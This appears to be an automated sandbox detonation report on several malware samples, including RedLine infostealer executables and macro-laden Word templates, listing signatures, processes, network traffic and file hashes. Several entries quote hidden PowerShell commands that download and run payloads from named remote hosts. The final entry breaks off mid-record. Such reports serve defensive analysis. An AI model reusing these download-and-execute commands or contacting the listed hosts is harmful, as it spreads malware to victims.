SHA512 d528ab74a67f16ebc4bb96b358db0ecd0f8a203a327d85b80d94272651be80d191c69932ca23648c3c3426755b4bb87f03c16e5c0597b104beac74225e232dd8

C:\Users\Admin\AppData\Local\Temp\TCD3EC2.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

89s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3908 set thread context of 5112 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3908 -ip 3908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5112 -ip 5112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 728

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win7-20240708-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -Command "Start-BitsTransfer -Source 'https://musiccenterconference.com/dwl/12.ps1' -Destination $($env:APPDATA + '\12.ps1'); & $($env:APPDATA + '\12.ps1')"

Network

N/A

Files

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/Zos.e`xe -Dest C:\Users\Public\Zos.e`xe;C:\Users\Public\Zos.e`xe

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 70.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.31:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 31.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 169.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wxtsu0t.wm5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 c59357e50e9bb8768be6c8e793ee6774
SHA1 a5a98a042eac13aa504035bc6e0c2787f29acfef
SHA256 c62265fbaf204f1cd8491ba62a29b839828e00c5a250ff3801276dcbf75fb93e
SHA512 0fad33925e276650fdfc3adefbe4bca684d5160806caa3fa7612064ba53578f3463bebe5d276186efc80bd2c8a0569e2d9aef85a2b39e437c24301aa6d76bd84

C:\Users\Admin\AppData\Local\Temp\TCD3146.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

157s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe -Dest C:\Users\Public\putty.exe;C:\Users\Public\putty.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx -Dest C:\Users\Public\simplecryptservice.docx;C:\Users\Public\simplecryptservice.docx

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.57:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 57.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 150.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/2952-0-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-1-0x00007FFB70A6D000-0x00007FFB70A6E000-memory.dmp

memory/2952-2-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-3-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-4-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-5-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-7-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-8-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-6-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-9-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-10-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-11-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-12-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-14-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-13-0x00007FFB2E340000-0x00007FFB2E350000-memory.dmp

memory/2952-15-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-16-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-17-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-19-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-18-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-20-0x00007FFB2E340000-0x00007FFB2E350000-memory.dmp

memory/2952-50-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-57-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-58-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a86c68c9e4166329b14b63a95ac1d804
SHA1 71bd2f004e8a440ba57e55148b6c95f9b7876156
SHA256 96abd542ea3e65c821f57afc7b564c35f35dfaa3fc6a0e009bb4156527f69409
SHA512 1dc981c54481bef11a4046d7285ef746d86a8c228dd6fb8607db95d738fd69ca2f020cc1c7d74758dfcf110e52546f4d1f1d8a759c05124e10a1a60e7c272fbb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7b2ec28de6e6464c0efd0ed57d149946
SHA1 586a72e4b8324710c52fdc8ab9da9d49d67706fa
SHA256 3ecfaed27f3c46a3aa2a958aea7a4c3d317b3cfcb0ea86375825dc4eed709c3a
SHA512 4ab4047355c41cfcc67cb9d19332e2092696f1a4a1e9023e4a91ce3ce94c513bfd0f8b4c9323422d927d133e88d174e6a8dbd699abb91df1708ce31c44409abd

memory/2800-72-0x0000027CFB2F0000-0x0000027CFB312000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxi4bxqf.wc4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2800-91-0x0000027CFB7C0000-0x0000027CFB7E6000-memory.dmp

memory/2800-92-0x0000027CFB810000-0x0000027CFB824000-memory.dmp

memory/2952-93-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-94-0x00007FFB70A6D000-0x00007FFB70A6E000-memory.dmp

memory/2952-95-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1d94235176612f6abfdfa619ec6c4e66
SHA1 300ed4e2883aa3e30fde5f45daf6f84d37f8a57a
SHA256 df30e6f8bd5a62974e2b0823286b2a84f4e63beb1250cbb58cae2e10a6e1af5c
SHA512 4b416ab23c554dff1d83e7ad6c4a4cb4ab259b832e04af591557570d8625e9e8b928ed2d5bfc053d84d0ebe8f3870ee71c458ffe532963f79b753e750b6819e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 61e2e57471d559f5f6813c0a7995c075
SHA1 33c621541bc0892ddab1b65345a348c14af566e5
SHA256 c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d
SHA512 9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

memory/2952-101-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-102-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-103-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-109-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDE303.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 45.93.201.114:80 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp

Files

memory/4876-0-0x00000000752CE000-0x00000000752CF000-memory.dmp

memory/4876-1-0x0000000000920000-0x0000000000B28000-memory.dmp

memory/4876-2-0x0000000004D00000-0x0000000004D92000-memory.dmp

memory/4876-3-0x0000000005370000-0x0000000005914000-memory.dmp

memory/4876-4-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/4876-5-0x00000000047E0000-0x00000000047EA000-memory.dmp

memory/5096-7-0x0000000002EC0000-0x0000000002EF6000-memory.dmp

memory/4876-8-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-11-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-10-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-9-0x0000000005A00000-0x0000000006028000-memory.dmp

memory/5096-12-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-13-0x0000000005920000-0x0000000005942000-memory.dmp

memory/5096-15-0x00000000061C0000-0x0000000006226000-memory.dmp

memory/5096-14-0x00000000060A0000-0x0000000006106000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wxbzmmvv.qjk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5096-21-0x0000000006230000-0x0000000006584000-memory.dmp

memory/5096-26-0x0000000006870000-0x000000000688E000-memory.dmp

memory/5096-27-0x00000000068B0000-0x00000000068FC000-memory.dmp

memory/5096-28-0x0000000007A10000-0x0000000007A54000-memory.dmp

memory/5096-29-0x0000000007B70000-0x0000000007BE6000-memory.dmp

memory/5096-30-0x0000000008270000-0x00000000088EA000-memory.dmp

memory/5096-31-0x0000000007C10000-0x0000000007C2A000-memory.dmp

memory/5096-32-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-35-0x00000000752C0000-0x0000000075A70000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2660 set thread context of 3124 N/A C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
FR 188.165.208.165:43504 tcp

Files

memory/2660-0-0x000000007474E000-0x000000007474F000-memory.dmp

memory/2660-1-0x0000000000F50000-0x0000000000F9A000-memory.dmp

memory/2660-2-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/2660-3-0x0000000005920000-0x0000000005986000-memory.dmp

memory/3124-5-0x0000000000540000-0x0000000000568000-memory.dmp

memory/3124-6-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/2660-8-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/3124-9-0x0000000005230000-0x0000000005848000-memory.dmp

memory/3124-10-0x0000000004D90000-0x0000000004E9A000-memory.dmp

memory/3124-11-0x0000000004CC0000-0x0000000004CD2000-memory.dmp

memory/3124-12-0x0000000004D20000-0x0000000004D5C000-memory.dmp

memory/3124-13-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/3124-14-0x0000000004EA0000-0x0000000004EEC000-memory.dmp

memory/3124-15-0x0000000074740000-0x0000000074EF0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

120s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm"

C:\Users\Admin\AppData\Local\Temp\powershell.exe

